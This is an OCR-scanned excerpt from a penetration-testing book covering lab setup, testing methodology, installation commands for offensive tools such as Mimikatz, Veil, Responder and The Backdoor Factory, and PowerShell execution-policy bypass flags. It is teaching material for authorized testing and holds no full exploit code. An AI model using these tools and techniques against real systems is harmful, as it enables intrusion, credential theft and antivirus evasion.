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Preface 


This is the second iteration of The Hacker Playbook (THP). For those that read the first book, this is 
an extension of that book. Below is an overview of all of the new vulnerabilities and attacks that will 
be discussed. In addition to the new content, attacks and techniques from the first book, which are still 
relevant today, are included to eliminate the need to refer back to the first book. So, what’s new? 
Some of the updated attacks from the last year and a half include: 

e Heartbleed 

e ShellShock 

e Kerberos issues (Golden Ticket/Skeleton Key) 

e PTH Postgres 

e New Spear Phishing 

e Better/Cheaper Dropboxes 

e Faster/Smarter Password Cracking 

e New WIFI attacks 

e Tons of PowerShell scripts 

e Privilege Escalation Attacks 

e Mass network compromises 

e Moving laterally smarter 

e Burp Modules 

e Printer Exploits 

e Backdoor Factory 

e ZAP Proxy 

e Sticky Keys 

e NoSQL Injection 

e Commercial Tools (Cobalt Strike, Canvas, Core Impact) 

e [ ab sections 

e And so much more 


In addition to describing the attacks that have changed in the last couple years, I have attempted to 
incorporate all of the comments and recommendations received from readers of the first book into this 
second book. A more in-depth look into how to set up a lab environment in which to test your attacks 
is also given, along with the newest tips and tricks of penetration testing. Lastly, I tried to make this 
version easier to follow since many schools have incorporated my book into their curricula. 
Whenever possible, I have added lab sections that help provide a way to test a vulnerability or 
exploit. 


What's not different? One of my goals from the first book was to make this as “real world" as 
possible. I really tried to stay away from theoretical attacks and focused on what I have seen from 
personal experience and what actually worked. The second goal was to strengthen your core 


understanding as a penetration tester. In other words, I wanted to encourage you to use different 
methods to boost your value to your current or future company or client. Just running a vulnerability 
scanner and submitting that as your report provides no real benefit to a company. Also, penetration 
tests with an extremely limited scope will give a false sense of security. To ТНРІ readers, rest 
assured that although you may find some familiar information, there is a great deal of new information 
in THP2, which has double the content compared to its predecessor. Additionally, by popular 
demand, I have created a slew of scripts and tools to help you in your hacking adventure. This was 
probably one of the top requests by readers, so I have included a ton of scripts located in my Github 
(https://github.com/cheetz) and tried to make it easier to follow. 


For those who did not read the first book, you might be wondering what experience I have as a 
penetration tester. My background comes from eight years of penetration testing for major financial 
institutions, large utility companies, Fortune 500 entertainment companies, and government 
organizations. I have also spent years teaching offensive network security, spoken at 
Toorcon/Derbycon/BayThreat, been referenced in many security publications, and currently run a 
security community of over 300 members in Southern California. My hope is that you will be able to 
take what I have learned and incorporate it into your own security lifestyle. 


From a technical standpoint, many tools and attacks have changed in the past couple years. With 
attacks like pass-the-hash, and with Group Policy Preferences getting patched, the process and 
methods of attackers have changed. 


One important note is that I am using both commercial tools and open source. For every commercial 
tool, I try to give an open source counterpart. I occasionally run into some pentesters that say they 
only use open source tools. As a penetration tester, I find this a hard statement to take. If you are 
supposed to emulate a “real world” attack, the “bad guys” do not have these restrictions, then you 
need to use any tool that works to get the job done. 


Who is this book intended for? You need to have some experience with Microsoft Active Directory, a 
solid understanding of Linux, some networking background, some coding experience (Bash, Python, 
Perl, Ruby, PHP, C, or anything along that line), and using security tools like vulnerability scanners 
and exploit tools (i.e. Metasploit). If you don't have the background, but are interested in getting into 
security, I would suggest making sure you have the basics down. You can’t just jump into security 
without the basic knowledge of how things work first. 


This book is not just for those looking to get into or who currently are in the offensive fields. This 
book provides valuable information and insight for incident responders as well, as they need to know 
how attackers think and what methods they use. 


Lastly, I want to discuss a bit about the difference between researchers and penetration testers. Many 
times, these two professions blend together, as both need to be knowledgeable in both areas. 
However, in this book, I separate the two areas slightly and focus on penetration testing. To clarify, in 


this book, a researcher is one who focuses on a single or limited scope and spends more time 
reversing the application/protocol/OS. Their goal is to discover an unknown exploit for that 
particular vulnerability. On the other hand (and remember this is a generalization), a penetration 
tester takes what is already known to compromise systems and applications. There will always be 
some overlap-a pentester will still fuzz vulnerabilities (for example, web parameters) and find zero- 
days—but he/she might not spend as much time finding all the issues as a researcher might. 


Last Notes and Disclaimer 


This book is not going to turn you into some sort of super hacker. It takes a lot of practice, research, 
and a love for the game. This book will hopefully make you think outside the box, become more 
creative, and help grow your understanding of flaws that occur in systems. 


Just remember, ONLY test systems on which you have written permission. Just Google the term 
“hacker jailed" and you will see plenty of different examples where young teens have been sentenced 
to years in prison for what they thought was a “fun time." There are many free platforms where legal 
hacking is allowed and will help you further educate yourself. 


Introduction 


You have been hired as a penetration tester for a large industrial company called Secure Universal 
Cyber Kittens, Inc. or SUCK, for short. They are developing future weapons to be used by the highest 
bidder and you have been given the license to kill...okay, maybe not kill, but the license to hack. This 
authorization gives you full approval to use any tactic in your arsenal to try to break into and steal the 
company’s trade secrets. 


As you pack your laptop, drop boxes, rubber duckies, Proxmarks, and cables, you almost forget the 
most important thing...The Hacker Playbook 2 (THP). You know that THP will help get you out of 
some of the stickiest situations. Your mind begins hazing back to your last engagement... 


After cloning some badges and deploying your drop box on the network, you run out of the office, 
barely sneaking past the security guards. Your drop box connects back to your SSH server and now 
you are on their network. You want to stay pretty quiet on the network and not trigger any IDS 
signatures. What do you look for? You flip to the Before the Snap chapter and remember printers! 
You probe around for a multifunction printer and see that it 1s configured with default passwords. 
Great! You re-configure LDAP on the printer, set up your netcat listener, and obtain Active Directory 
credentials. Since you don’t know what permissions these credentials have, you try to psexec to a 
Windows machine with a custom SMBexec payload. The credentials work and you are now a regular 
user. After a couple tricks with PowerTools in the Lateral Pass section, you move to local admin and 
pull passwords from memory with Mimikatz. Phew... you sigh... this is too easy. After pulling 
passwords for a few accounts, you find where the domain admins (DA) are and connect to their boxes 
to pull passwords again. With domain admin creds, it is pretty straightforward to dump the Domain 
controller (DC) with psexec_ntdsgrab and then clear your tracks... 


Glad you didn’t forget your copy of THP! 


Standards 


Before we can dive into THP, we need to understand some of the basics and standards used for 
penetration testing. This will be the foundation for recon, finding and exploiting vulnerabilities, and 
reporting. There really is no right way to perform an engagement, but you will need to at least cover 
the basics. 


The Penetration Testing Execution Standard 
(PTES - http://www.pentest-standard.org/index.php): 


PTES is the current standard for performing penetration tests. These are referenced regularly and are 
the core elements in what goes on in an engagement. I highly recommend that you go through the entire 


PTES technical guideline as it is full of detailed information. The standard accepted model consists 
of seven main sections: 

Pre-engagement Interactions 

Intelligence Gathering 

Threat Modeling 

Vulnerability Analysis 

Exploitation 

Post Exploitation 

Reporting 


MO ROS 


One thing I encourage you to do is to be creative and find what works for you. For me, although the 
PTES framework is a great model for performing penetration tests, I like taking penetration tests and 
tweaking the standard model. From experience, the standard I would typically use would look 
something like the following: 

Intelligence Gathering 

Initial Foothold 

Local/Network Enumeration 

Local Privilege Escalation 

Persistence 

Lateral Movement 

Domain Privilege Escalation 

Dumping Hashes 

Data Identification/ Exfiltration 

Reporting 
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This breakdown shows what I would perform and focus on during a penetration test. After the initial 
foothold via social engineering, the focus 1s to acquire a privileged account. To get there, you have to 
enumerate the system/network and look for misconfigurations or local vulnerabilities. We also need 
to implement persistence, just in case we end up losing our shells. Once at a system or elevated 
account, we need to see if we can acquire a domain-privileged account. To do this, we need to 
compromise other boxes to eventually get to a domain admin (DA) account. At a domain controller 
(DC), the best part of the test is to dump the domain hashes and take a quick break for a happy dance. 
This test should not end here. Where customer value really comes into play is going after sensitive 
data, especially personally identified information (PII), intellectual property (IP), or other 
information requested by the client. Lastly, since we all know that reporting pays the bills, having a 
good standard template and valuable data will set you apart from the competition. 


Of course, this was all a very quick and high-level example of what can occur during an assessment. 
To guide you through this process, I have tried to develop a format to help you on your path. The 
Hacker Playbook is setup with 11 different sections, laid out as a football playbook. But, do not 
worry, you don’t necessarily need to know the football terms in detail to follow along. Here is the 
breakdown: 


Updates 


e Pregame: This is all about how to set up your lab, attacking machines, and the tools 
we will use throughout the book. 

e Before the Snap: Before you can run any plays, you need to scan your environment 
and understand what you are up against. We will dive into discovery and smart 
scanning. 

e The Drive: Take the vulnerabilities which were identified from Before the Snap 
and start exploiting those systems. This is where we get our hands a little dirty and 
start exploiting boxes. 

e The Throw: Sometimes you need to get creative and look for the open target. We 
will take a look at how to find and exploit manual web application findings. 

e The Lateral Pass: After you have compromised a system, we will discuss ways to 
move laterally through the network. 

e The Screen: A play typically used to trick the enemy. This chapter will explain 
social engineering tactics. 

e The Onside Kick: A deliberately short kick that requires close distance. Here, I will 
describe attacks that require physical access. 

e The Quarterback Sneak: When you only need a couple of yards, a quarterback sneak 
is perfect. Sometimes you will get stuck with antivirus (AV); this chapter describes 
how to get over those small hurdles by evading AV. 

e Special Teams: Cracking passwords, exploits, NetHunter and some tricks. 

e Two-Minute Drill: You have only two minutes on the clock and you need to go from 
no access to full domain admin. 

e Post-Game Analysis: Reporting your findings. 


As we all know, security changes quickly and things break all the time. I try to keep up with all of the 
changes and any requests you might have. You can find updates here: 


Subscribe for Book Updates: 


http://thehackerplaybook.com/subscribe 
Twitter: @HackerPlaybook 
URL: http://TheHackerPlaybook.com 


Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 


Pregame - The Setup 


Before we can start attacking Secure Universal Cyber Kittens, Inc. (SUCK), we need to build our 
testing lab to test our attacks, develop our attacking machines, and understand how our exploits work. 
Practice and testing are invaluable when it comes to running a full scale attack. You don’t want to be 
the average Joe on a test using untested exploits which inadvertently takes down a critical system, 
getting you identified and tossed out of the company. 


Building A Lab 


It might be hard to build a full lab with all the applications, operating systems, and network 
appliances, but you need to make sure you have the core components. These include basic Linux 
servers and Windows systems. 

Since Microsoft Windows operating systems aren’t free, you may have to purchase some software. If 
you are a student, you can generally get free software through your school. You can also check 
Microsoft DreamSpark (https://www.dreamspark.com/) to see if you qualify. I think with a default 
.edu email address you can get Windows 2012 and other software for free. 


Building Out A Domain 


Practicing on a Microsoft Active Directory (AD) environment is good; however, one of the best ways 
to learn is to build one yourself. Knowing how and why things work on an AD environment will help 
you later on in life. I have put together condensed step-by-step instructions on how to set up an AD 
domain controller that should get you up and running. For those who have never built a DC and client 
before, I highly recommend you do this first. Before you can really understand what you are attacking, 
you need to understand how it works. 


In the example provided below, I will install a Windows Domain Environment using Windows 2012 
R12, Windows 8 and Windows 7. In this book, I wanted to focus on the newer operating systems. 
However, if you are looking to test older exploits, you may want to consider installing Windows XP 
SP2. Check out my Active Directory installation guide here: 


http://www.thehackerplaybook.com/Windows_Domain.htm 


Building Out Additional Servers 


Below are the vulnerable virtual machines I recommend. Many of the 
labs in this book will use these two frameworks for testing. For your 


own practice, you should look at the other test servers mentioned at the 
end of this book. 


Metasploitable2 
This is a great vulnerable Ubuntu Linux virtual machine that 


intentionally contains common vulnerabilities. This is great for testing 
security tools, such as Metasploit, and demonstrating common attacks. 
It is relatively easy to set up as you just need to download the virtual 
machine (VM) and boot it in a Virtual Platform. 


e http://sourceforge.net/projects/metasploitable/files/Metaspl: 


OWASPBWA (OWASP Broken Web Applications Project 

While Metasploitable2 focuses on services, OWASPBWA is a great 
collection of vulnerable web applications. This is one of the most 
complete vulnerable web application collections in a single VM. This 
VM will be used for many of the web examples throughout the book. As 
with Metasploitable2, just download the vulnerable VM and boot it up. 


ө http://sourceforge.net/projects/owaspbwa/files/ 


Practice 


Penetration testing is like any other profession and needs to be second nature. Every test is 
completely different and you need to be able to adapt with the changing environment. Without 
adequate practice, trying multiple different tools, and exploiting systems using different payloads, you 
won’t be able to adapt if you ever run into a brick wall. 


Building Your Penetration Testing Box 


In The Hacker Playbook One book, I received some comments on why I have you build and install 
the tools instead of creating one script to automate it all. The main reason I have my readers manually 
go through these steps is because these are extremely important tools and this will help you remember 
what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well- 
organized, but if you don’t know the tool is installed or you haven’t played around with the individual 
attacks, then it won't really be helpful in that dire need situation. 


Setting Up A Penetration Testing Box 


If you set up your box from the first book, you can breeze over this section. As you know, I always 
like bringing two different laptops to an engagement. The first is a Windows box and the second 15 
either an OS X or Linux host. The reason I bring two laptops is because I have been on penetration 
tests where, on very specific networks, the OS X host would not connect to the network. Instead of 
spending hours trying to figure out why, I just started all of my attacks and scanning from my 
Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times 
having two laptops has saved me. 


It doesn’t matter if you run Windows, OS X, or some Linux flavor on your base system, but there are a 
few musts. First, you need to install a Virtual Machine (VM) platform. You can use Virtual Box 
(https://www.virtualbox.org) or VMWare Player (https://my.vmware.com/web/vmware/downloads) 
or any others of your choice. Both are free on Windows and only Virtual Box on OS X is free. I 
would highly recommend getting the commercial versions for your VM platform as they have a wealth 
of extra features, such as encryption, snapshots, and much better VM management. 


Since we are going to install most of our tools on our VMs, the most important step is to keep your 
base system clean. Try not to even browse personal sites on the base image. This way, your base 
system is always clean and you won’t ever bring malware onto a client site (I have seen this many 
times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot 
the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is 
revert back to the baseline image, patch and update tools, and add any additional tools I need. Trust 
me, this tactic is a lifesaver. I can't count the number of past assessments where I spent way too much 
time setting up a tool that should have already been installed. 


Hardware 


Penetration Testing Laptop 
For your basic penetration laptop requirements, they haven’t changed much from the previous book. 


Basic recommendations: 
e Laptop with at least SGB of RAM 
e 500GB hard drive (solid state is highly recommended) 
e Intel Quad Core 17 Processor 


Password Cracking Desktop 
This is completely optional, but with the number of tests where I have compromised hashes, faster 


password cracking equipment was required. Although, you could purchase some crazy rig with 8 


GPUs that runs on a Celeron processor, I have built a multi-purpose box with plenty of space and 
amazing password cracking power. Later in the book, I will go over the actual specs and tools I built 
out for password cracking and the reasons why I went this route. 


Password Cracking/Multi-purpose Hacking Box 


e Case: CORSAIR Vengeance C70 
e Video Card: SAPPHIRE 100360SR Radeon R9 295x2 8GB GDDR5 
e Hard Drive: SAMSUNG 840 EVO MZ-7TES500BW 2.5" 500GB SATA III TLC 
Internal SSD 
e Power Supply: SILVERSTONE ST1500 1500W ATX 
e RAM: CORSAIR Vengeance Pro 16GB (2 x 8GB) 240-Pin DDR3 SDRAM DDR3 
1600 
e CPU: CORE I7 4790K 4.0G 
e Motherboard: ASUS MAXIMUS VII FORMULA 
e CPU Cooler: Cooler Master Hyper 212 EV 
This is definitely overkill for just password cracking, since the only thing that really matters are the 
GPUs; but, again, I still wanted to use this as an additional system in my arsenal. 


Open Source Versus Commercial Software 


In this book, I thought it would be beneficial to include a comparison of open source and commercial 
software. Although not everyone has the funds to purchase commercial software, it is very important 
to know what 1s available and what an attacker might use. Both as a defender and someone who runs 
offensive plays, having the right tools can definitely make the difference. In this book, I will show you 
several different commercial software tools that I find very useful, which can assist in various types 
of offensive situations. With every commercial software, I will try to provide an open source 
companion, but it may not always be available. 


Commercial Software in The Hacker Playbook 2 
e Burp Suite Pro 


e Canvas 

e Cobalt Strike 
e Core Impact 
e Nessus 

e Nexpose 


Kali Linux 
(https://www.kali.org/) 


For those who have never used Kali Linux, it is often seen as the standard in offensive penetration 


testing. This Debian-based Linux distro contains a wealth of different security tools all preconfigured 
into a single framework. This is a great starting point for your offensive security platform and the 
book mainly builds off of this Linux distribution. I highly recommend that you download the virtual 
machine and use this for your testing. 


Back Box 
(http://www.backbox.org/) 


Although Kali Linux is seen as the standard, it is best to not ever rely on a single tool/OS/process— 
this will be a constant theme throughout the book. The developers could stop supporting a certain tool 
or, even worse, you begin to experience tunnel vision and rely on old methods. The guys over at Back 
Box are doing great work building and supporting another security platform. The main differences 1 
can see is that Back Box is based on Ubuntu and more importantly, comes with default user rights 
management (instead of everyone running as root in Kali Linux). Some people are more comfortable 
with Ubuntu and I have gotten into situations where specific tools are developed for and run more 
stable on Ubuntu versus Kali. Again, it should be just another tool available at your reach and it is 
good to know what is out there. 


Setting Up Your Boxes 


There are many tools that are not included or that need to be modified from the stock tool set in any of 
the security distributions (distro). I like to put them in a directory where I know where they exist and 
can be used easily. Here are the tools that you will need to install. 


Recon/Scanning Tools 

e Discover 

e EyeWitness 

e HTTPScreenShot 

ө WMAP 

e SpiderFoot 

e Masscan 

e Gitrob 

e CMSmap 

e Recon-ng 

e SPARTA 

e WPScan 

e Password Lists 
Exploitation 

e Burp Suite Pro 

e ZAP Proxy Pro 

e NoSQLMap 

e SOLMap 


e SQLNinja 

e BeEF Exploitation Framework 
e Responder 

e Printer Exploits 

e Veil 

e WIFIPhisher 

e Wifite 

e SET 


Post Exploitation 
e Hacker Playbook 2 - Custom Scripts 
e SMBexec 
e Veil 
e WCE 
e Mimikatz 
ө PowerSploit 
e Nishang 
e The Backdoor Factory 
e DSHashes 
e Net-Creds 


Setting Up Kali Linux 


There are many different ways you can set up your attacker host, but I want you to be able to mimic 
all of the examples in this book. Before going on, you should try to configure your host with the 
settings below. Remember that tools do periodically change and that you might need to make small 
tweaks to these settings or configurations. (Don't forget to check the updates page at 
http://www.thehackerplaybook.com). For those users that have only purchased the physical book, I 
have copied the whole settings | and software section to my Github 
(http://www.github.com/cheetz/thp2). This should make copying and pasting much easier, so you 
don’t have to type each command in by hand. 


Since this book is based off of the Kali Linux platform, you can download the Kali Linux distro from: 
http://ww'w.kali.org/downloads/. I highly recommend you download the VMware image 
(https://www.offensive-security.com/kali-linux-vmware-arm-image-download/) ^ and download 
Virtual Player/VirtualBox. Remember that it will be a gz-compressed and tar archived file, so make 
sure to extract them first and load the vmx file. 


Once Your Kali VM is Up and Running 
e Log in with the username root and the default password toor 


e Open a terminal 


e Change the password 
© passwd 


e Update the image 


О apt-get update 
о apt-get dist-upgrade 
e Setup Metasploit database 
© service postgresql start 
e Make postgresql database start on boot 
o update-rc.d postgresql enable 
e Start and stop the Metasploit service (this will setup the database.yml file for you) 
© service metasploit start 
© service metasploit stop 


e Install gedit 


© apt-get install gedit 


e Change the hostname - Many network admins look for systems named Kali in logs 
like DHCP. It is best to follow the naming standard used by the company you are 


testing 


© gedit /etc/hostname 

ш Change the hostname (replace kali) and save 
© gedit /etc/hosts 

ш Change the hostname (replace kali) and save 
© reboot 


e *Optional for Metasploit - Enable Logging 


Tool Installation 
The Backdoor Factory: 


о ist this as optional since logs get pretty big, but you have the ability 
to log every command and result from Metasploit’s Command Line 
Interface (CLI). This becomes very useful for bulk attack/queries or if 
your client requires these logs. *If this is a fresh image, type 
msfconsole first and exit before configuring logging to create the .msf4 
folder. 
о Froma command prompt, type: 
и echo “spool /root/msf console.log" > 
/root/.msfA/msfconsole.rc 
о Logs will be stored at /root/msf console.log 


e Patch PE, ELF, Mach-O binaries with shellcode. 
e git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor- 


factory 


e cd the-backdoor-factory 


e /install.sh 


HTTPScreenShot 


SMBExec 


Masscan 


Gitrob 


e HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of 
websites. 
e pip install selenium 
e git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot 
e cd /opt/httpscreenshot 
e chmod +x install-dependencies.sh && ./install-dependencies.sh 
e HTTPScreenShot only works if you are running on a 64-bit Kali by default. If you 
are running 32-bit PAE, install 1686 phatomjs as follows: 
o wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs- 
1.9.8-linux-1686.tar.bz2 
о bzip2 -d phantomjs-1.9.8-linux-1686.tar.bz2 
o tar xvf phantomys-1.9.8-linux-1686.tar 
о cp phantomjs-1.9.8-linux-1686/bin/phantomjs /usr/bin/ 


e A rapid psexec style attack with samba tools. 

e git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec 
e cd /opt/smbexec && ./install.sh 

e Select 1 - Debian/Ubuntu and derivatives 

e Select all defaults 

e /install.sh 

e Select 4 to compile smbexec binaries 

e After compilation, select 5 to exit 


e This is the fastest Internet port scanner. It can scan the entire Internet in under six 
minutes. 

e apt-get install git gcc make libpcap-dev 

e git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan 

e cd /opt/masscan 

e make 

e make install 


e Reconnaissance tool for GitHub organizations 

e git clone https://github.com/michenriksen/gitrob.git /opt/gitrob 
e gem install bundler 

e service postgresql start 

e su postgres 

e createuser -s gitrob --pwprompt 

e createdb -O gitrob gitrob 

e exit 


e cd /opt/gitrob/bin 
ө gem install gitrob 


CMSmap 
e CMSmap is a python open source CMS (Content Management System) scanner that 
automates the process of detecting security flaws 
e git clone https://github.com/Dionach/CMSmap /opt/CMSmap 
WPScan 
e WordPress vulnerability scanner and brute-force tool 
e git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan 
e cd /opt/wpscan && ./wpscan.rb --update 
Eyewitness 


e EyeWitness is designed to take screenshots of websites, provide some server 
header info, and identify default credentials 1f possible. 
e git clone https://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness 


Printer Exploits 
e Contains a number of commonly found printer exploits 
e git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit 


SOLMap 
e SQL Injection tool 
e git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap 


Recon-ng 
e A full-featured web reconnaissance framework written in Python 
e git clone https://bitbucket.org/ LaNMaSteR53/recon-ng.git /opt/recon-ng 


Discover Scripts 
e Custom bash scripts used to automate various pentesting tasks. 
e git clone https://github.conyleebaird/discover.git /opt/discover 
e cd /opt/discover && ./setup.sh 


BeEF Exploitation Framework 
€ A cross-site scripting attack framework 
e cd /opt/ 
e wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef 
e chmod +x install-beef 


Responder 


e /install-beef 


e A | LLMNR, NBIT-NS and МОМ  poisoner, with built-in 
HTTP/SMB/MSSQL/FTP/LDAP | rogue authentication server supporting 
NTLMvI/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP 
authentication. Responder will be used to gain NTLM challenge/response hashes 

e git clone https://github.com/SpiderLabs/Responder. git /opt/Responder 


The Hacker Playbook 2 - Custom Scripts 


e A number of custom scripts written by myself for The Hacker Playbook 2. 

e git clone https://github.com/cheetz/Easy-P. git /opt/Easy-P 

e git clone https://github.com/cheetz/Password_ Plus One /opt/Password Plus One 
e git clone https://github.conycheetz/PowerShell Popup /opt/PowerShell Popup 

e git clone https://github.com/cheetz/icmpshock /opt/icmpshock 

e git clone https://github.com/cheetz/brutescrape /opt/brutescrape 

e git clone https://www.github.com/cheetz/reddit_xss /opt/reddit xss 


The Hacker Playbook 2 - Forked Versions 


DSHashes: 


SPARTA: 


NoSQLMap 


e Forked versions of PowerSploit and Powertools used in the book. Make sure you 
clone your own repositories from the original sources. 

e git clone https://github.com/cheetz/PowerSploit /opt/HP_PowerSploit 

e git clone https://github.com/cheetz/PowerTools /opt/HP PowerTools 

e git clone https://github.com/cheetz/nishang /opt/nishang 


e Extracts user hashes in a user-friendly format for NTDS Xtract 
ө weet http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O 
/opt/NTDSXtract/dshashes.py 


e A python GUI application which simplifies network infrastructure penetration 
testing by aiding the penetration tester in the scanning and enumeration phase. 

e git clone https://github.com/secforce/sparta.git /opt/sparta 

e apt-get install python-elixir 

e apt-get install Idap-utils rwho rsh-client x1 1-apps finger 


e A automated pentesting toolset for MongoDB database servers and web 
applications. 
e git clone https://github.com/tcstool/NoSQLMap. git /opt/NoSQLMap 


Spiderfoot 


WCE 


Mimikatz 


SET 


e Open Source Footprinting Tool 

e mkdir /opt/spiderfoot/ && cd /opt/spiderfoot 

ө weet http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0- 
src.tar.gz/download 

ө tar xzvf download 

e pip install Ixml 

e pip install netaddr 

e pip install M2Crypto 

e pip install cherrypy 

e pip install mako 


e Windows Credential Editor (WCE) is used to pull passwords from memory 
e Download from: http://www.ampliasecurity.com/research/windows-credentials- 
editor/ and save to /opt/. For example: 
о wget 
www.ampliasecurity.com/research/wce vl 4beta universal.zip 
o mkdir /opt/wce && unzip усе v1* -d /opt/wce && rm усе vl1*.zip 


e Used for pulling cleartext passwords from memory, Golden Ticket, skeleton key and 

more 

e Grab the newest release from https://github.com/gentilkiwi/mimikatz/releases/latest 
о са /opt/ && weet 
http://blog. gentilkiwi.com/downloads/mimikatz_trunk.zip 
o unzip -d ./mimikatz mimikatz trunk.zip 


e Social Engineering Toolkit (SET) will be used for the social engineering campaigns 
e git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/ 
e cd /opt/set && ./setup.py install 


PowerSploit (PowerShell) 


e PowerShell scripts for post exploitation 
e git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit 


ө са /opt/PowerSploit && weet 
https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && 
wget 


https://raw.githubusercontent.com/darkoperator/powershell scripts/master/ps encodei 


Nishang (PowerShell) 
ө Collection of PowerShell scripts for exploitation and post exploitation 
ө git clone https://github.com/samratashok/nishang /opt/nishang 


Veil-Framework 
e A red team toolkit focused on evading detection. It currently contains Veil-Evasion 
for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and 
Veil-PowerView for gaining situational awareness on Windows domains. Veil will be 
used to create a python based Meterpreter executable. 
ө git clone https://github.com/Veil-Framework/Veil /opt/Veil 
e cd /opt/Veil/ && ./Install.sh -c 


Burp Suite Pro 
e Web Penetration Testing Tool 


e Download: http://portswigger.net/burp/proxy.html. I would highly recommend that 
you buy the professional version. It is well worth the $299 price tag. 


ZAP Proxy Pro 
e OWASP ZAP: An easy-to-use integrated penetration testing tool for discovering 
vulnerabilities in web applications. 
ө Download from: https://code.google.com/p/zaproxy/wiki/Downloads?tm=2 
e “Included by default in Kali Linux (owasp-zap) 


Fuzzing Lists (SecLists) 
e These are scripts to use with Burp to fuzz parameters 
e git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists 


Password Lists 


e For the different password lists, see the section: Special Teams - Cracking, 
Exploits, and Tricks 


Net-Creds Network Parsing 
e Parse PCAP files for username/passwords 
e git clone https://github.com/DanMclInerney/net-creds.git /opt/net-creds 


Installing Firefox Add-ons 
e Web Developer Add-on: https://addons.mozilla.org/en- US/firefox/addon/web- 
developer/ 
e Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 
e Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 


e User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent- 
switcher/ 


Wifite 

e Attacks against WiFi networks 

ө git clone https://github.com/derv82/wifite /opt/wifite 
WIFIPhisher 

e Automated phishing attacks against WiFi networks 

e git clone https://github.com/sophron/wifiphisher. git /opt/wifiphisher 
Phishing (Optional): 


e Phishing-Frenzy 
o git clone https://github.conypentestgeek/phishing-frenzy.git 
/var/www/phishing-frenzy 

e Custom List of Extras 
o git clone https://github.com/macubergeek/gitlist.git /opt/gitlist 


*Remember to check http://thehackerplaybook.com/updates/ for any updates. 


Windows VM 


I highly recommend you also configure a Windows 7/8 Virtual Machine. This is because I have been 
on many tests where an application will require Internet Explorer or a tool like Cain and Abel, which 
will only work on one operating system. Remember, all of the PowerShell attacks will require you to 
run the commands on your Windows hosts. The point is to always be prepared because you will save 
yourself a lot of time and trouble having multiple operating systems available. 


High level tools list addition to Windows 
e HxD (Hex Editor) 


e Evade (Used for AV Evasion) 
e Hyperion (Used for AV Evasion) 
ө Metasploit 

e Nexpose/Nessus 

e Nmap 

e oclHashcat 

e Cain and Abel 

e Burp Suite Pro 

e Nishang 

e PowerSploit 

e Firefox (Add-ons) 


о Web Developer Add-on 
o Tamper Data 

о Foxy Proxy 

о User Agent Switcher 


Setting Up Windows 


Setting up a Windows common testing platform should help complement your Kali Linux host. 
Remember to change your host names, disable NetBios if you don’t need it, and harden these boxes as 
much as possible. The last thing you want is to get owned during an assessment. 


There isn’t anything special that I setup on Windows, but usually I will install the following. 


e HxD http://mh-nexus.de/en/hxd/ 

e Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont 

e Hyperion http://www.nullsecurity.net/tools/binary.html 
о Download/install a Windows Compiler 
http://sourceforge.net/projects/mingw/ 
o Run “make” in the extracted Hyperion folder and you should have the 
binary. 

e Download and install Metasploit http://www.Metasploit.con/ 

ө Download and install either Nessus or Nexpose 
о If you are buying your own software, you should probably look into 
Nessus as it is much cheaper, but both work well 

ө Download and install nmap http://nmap.org/download.html 

ө Download and install oclHashcat http://hashcat.net/oclhashcat/ 

ө Download and install Cain and Abel http://www.oxid.it/cain.html 

ө Download Burp Proxy Pro http://portswigger.net/burp/download.html 

ө Download and extract Nishang: https://github.com/samratashok/nishang 

ө Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/ 

e Installing Firefox Addons 
o Web Developer Add-on: https://addons.mozilla.org/en-US/ 
firefox/addon/web-developer/ 


о Татрег Data: https://addons.mozilla.org/en-US/firefox/ 
addon/tamper-data/ 
о Foxy Proxy: https://addons.mozilla.org/en-US/firefox/ 


addon/foxyproxy-standard/ 
о (ег Agent Switcher: https://addons.mozilla.org/en-US/ 
firefox/addon/user-agent-switcher/ 


Power Up With Powershell 


PowerShell has really changed the game on penetration testing. If you don’t have any experience with 
PowerShell, I would highly recommend you take some time and write some basic PowerShell scripts. 
If you need something to help get you in the PowerShell game, take a look at this video: 

e Intro to PowerShell Scripting for Security: http://bit.ly/ I MCb7EJ 
The video is kind of long, but will get you some of the basics you need to get your PowerShelling off 
the ground. 


Why do I focus so much on PowerShell in this book? The benefits of PowerShell for a penetration 
tester: 

e Installed by default on Windows 7+ machines 

e PowerShell scripts can run in memory 

e Almost never triggers antivirus 

e Utilizes .NET Framework classes 

e Takes advantage of credentials of the user (for querying Active Directory) 

e Can be used to manage Active Directory 

e Remotely executes PowerShell scripts 

e Makes scripting Windows attacks much easier 

e Many tools are now being built in PowerShell and understanding it will make you a 

more powerful and efficient penetration tester 


You can always drop into a PowerShell command from a Windows terminal prompt by typing 
"powershell" and get to the help menu by typing “help” once inside PowerShell. Here are the basic 
flags and settings used throughout the book: 


e -Exec Bypass: Bypass Security Execution Protection 
o This one is extremely important! By default, PowerShell has an 
execution policy to not run PowerShell command/files. By running this 
command you bypass any of those settings. Throughout the book we 
will use this flag almost every time. 

e -Nonl: Noninteractive Mode - PowerShell does not present an interactive prompt to 

the user 

e -NoProfile (or -NoP): Enforces PowerShell console not to load the current user's 

profile 

